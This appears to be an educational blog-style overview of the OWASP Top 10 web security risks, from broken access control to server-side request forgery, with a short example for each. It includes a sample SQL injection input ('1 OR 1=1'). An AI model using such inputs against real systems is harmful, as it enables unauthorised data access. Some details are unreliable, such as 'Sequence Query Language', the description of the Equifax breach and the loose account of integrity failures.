Open Web Application Security Project (OWASP) is a non-profit organization dedicated to address security threats. They address top 10 security issues in a report along with mitigation advice. They provide materials such as documentations, tools, videos, and forums for free.
It is an open source research project where security experts in this organization grade and rank security issues based on the following categories:
Level of possible impact.
Severity of the issue.
Frequency of the security issue.
Apart from security researchers who use this report to test these issues; it is also helpful for developers helping them understand common security concerns and reduces the presence of security threats at an early stage of development.
This report is updated every 2-3 years depending on the evolution of technology.
A01-Broken Access Control
Broken access control means no verification of proper access checks to the requested resource.
For example:
To access an application’s admin dashboard, admin access is required.
The parameter is changed to check for access in the second URL. If no validation is taking place, the URL could provide unauthorized access to the admin dashboard.
A02- Cryptographic Failures
If sensitive information is stored in the application which can be accessed publicly, issues such as UBER data leak can take place.
Examples of sensitive information exposure are as follows:
Session tokens
login ID and passwords
online transactions
personal details (SSN, Health records) etc.
If the web application uses old cryptographic hashes which can be easily cracked, an attacker can gain access to the victim's account whether the data is at rest or is moving, it is a very serious issue giving it the second ranking in OWASP Top 10 list.
A03- Injection
When the web application trusts user input and does not sanitize or validate the input a user provides to the application, injection attacks are bound to happen.
For example, Sequence Query Language (SQL) injection is the attack where due to no input sanitization, a user can directly interact with the database by simply using SQL statements and the application will respond accordingly. The impact of this vulnerability is that the attacker can access sensitive information such as personally identifiable information(PII) which might also include your credit card information.
Common example of SQL injection is when “1 OR 1=1” is passed instead of just “1”. Using OR and a true statement(1=1) is always going to be a true condition. So, if the web application is vulnerable to SQL injection, the above logic will always be true and the web application will disclose sensitive information.
A04- Insecure Design
In the latest OWASP Top Ten revision, the report focuses on risks associated with design and architectural flaws in applications. It recommends implementing threat modeling, secure design patterns, and reference architectures from the initial stages of the design process.
For example:
File Upload Vulnerability - We all have come across web applications where we can upload a file, it usually asks for PDF, JPEG, PNG files. However, if we can upload other extensions such as PHP, JS, etc, then this is an architectural flaw as only the requested file formats should be allowed to upload.
The impact of this vulnerability is that an attacker can upload malware in the web application possibly resulting in full compromise of the server.
A05- Security Misconfiguration
Security misconfiguration vulnerabilities arise from poorly configured permissions and settings on the servers.
For example:
Open ports, default configurations, incorrect HTTP headers, privileges etc. are some of the common examples which make an application vulnerable to data breach.
A06- Vulnerable and Outdated Components
Many web applications are using old versions of technology or rely on third-party components and frameworks. Vulnerabilities in these components may have publicly available exploits. Using these exploits is not hard, making it easy for an attacker to attack the web application.
For example:
Equifax data breach occurred in 2017 due to the organization using a vulnerable version of Apache Struts. This resulted in data breach of employee credentials. This information helped the attackers compromise internal networks of Equifax.
A07- Identification and Authentication Failures
This vulnerability concerns improper identification and authentication, which can lead to attackers gaining unauthorized access to user information, password recovery, ID sessions, and login credentials. Examples include URL rewriting with session IDs.
Brute force attacks are a major driver of broken authentication attempts, such as credential stuffing. In these attacks, hackers exploit a users’ habit of reusing usernames and passwords across multiple online accounts. By testing stolen credentials, attackers gain unauthorized access to various services. Strong, unique passwords and multi-factor authentication help mitigate this risk.
For example: An online shopping platform has an application that supports URL rewriting, putting session IDs in the URL.
A08- Software and Data Integrity Failures
Software and data integrity failure is important as sensitive information is increasingly stored in databases, where it's at risk of getting tampered. It's like when a computer program or the data it uses gets broken or changed by mistake, which can cause errors or problems. This is a concern for keeping software and data safe from accidents or attacks.
For example:
Imagine you have important files on your computer that contain sensitive information, like your passwords or financial details. Now, someone accidentally changes the information in those files, making it look like you have different passwords or wrong financial numbers. That's a data integrity failure because the information in your files got messed up.
A09-Security Logging and Monitoring Failures
It means that the computer systems aren't properly watching and recording what's happening, so if something bad happens, you might not know until it's too late. This can lead to security breaches and data theft.
This is where a monitoring system is handy. It will send an alert in case something happens with your web application which will help you instruct on how to address issues in a timely manner.
Without logging and monitoring processes in place, one could not understand what is happening to their systems in case of a cyber attack.
A10- Server Side Request Forgery (SSRF)
SSRF is when a person tricks a server into doing things it shouldn't, like accessing or sending data to other servers, and sometimes it can be used to harm the server or steal information.
For example:
A web application can be vulnerable to an SSRF attack if it does not validate the remote resource URL supplied by the user.
– A potential remote resource URL could be http://target.example.com/inc/sharefile.asp
– If no validation is performed by the web application of the URL , the user might exploit this to access internal networks and other internal resources.
Resources: